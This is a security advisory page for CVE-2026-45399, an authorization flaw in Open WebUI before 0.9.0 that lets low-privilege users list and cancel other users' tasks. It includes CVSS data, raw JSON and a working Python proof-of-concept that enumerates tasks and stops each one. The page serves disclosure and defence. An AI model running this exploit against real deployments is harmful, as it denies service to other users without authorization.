Security Vulnerability Report
中文
CVE-2026-45399 CVSS 7.1 HIGH

CVE-2026-45399

Published: 2026-05-15 20:16:49
Last Modified: 2026-05-15 20:16:49
Source: [email protected]

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, any authenticated user with low privileges can enumerate active background tasks across the system and stop tasks belonging to other users via the GET /api/tasks and POST /api/tasks/stop/{task_id} methods. This allows a casual user to disrupt system-wide chat usage by continuously canceling other users' active tasks. This is a real authorization vulnerability affecting integrity and usability in multi-user deployments. This vulnerability is fixed in 0.9.0.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Configuration target_url = "http://localhost:3000" # Replace with actual target auth_token = "LOW_PRIVILEGE_USER_TOKEN" # Attacker's session token headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } # Step 1: Enumerate active tasks (IDOR vulnerability) # This endpoint returns tasks for ALL users, not just the current one enum_url = f"{target_url}/api/tasks" response = requests.get(enum_url, headers=headers) if response.status_code == 200: tasks = response.json() print(f"[+] Successfully enumerated {len(tasks)} tasks.") # Step 2: Stop tasks belonging to other users for task in tasks: task_id = task.get('id') # URL to stop a specific task stop_url = f"{target_url}/api/tasks/stop/{task_id}" # Exploit: Send POST request to stop the task # The server does not check if the current user owns this task_id exploit_resp = requests.post(stop_url, headers=headers) if exploit_resp.status_code == 200: print(f"[+] Successfully stopped task ID: {task_id}") else: print(f"[-] Failed to stop task ID: {task_id}") else: print("[-] Failed to enumerate tasks.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45399", "sourceIdentifier": "[email protected]", "published": "2026-05-15T20:16:48.950", "lastModified": "2026-05-15T20:16:48.950", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, any authenticated user with low privileges can enumerate active background tasks across the system and stop tasks belonging to other users via the GET /api/tasks and POST /api/tasks/stop/{task_id} methods. This allows a casual user to disrupt system-wide chat usage by continuously canceling other users' active tasks. This is a real authorization vulnerability affecting integrity and usability in multi-user deployments. This vulnerability is fixed in 0.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8jjp-r2w2-4v22", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8jjp-r2w2-4v22", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.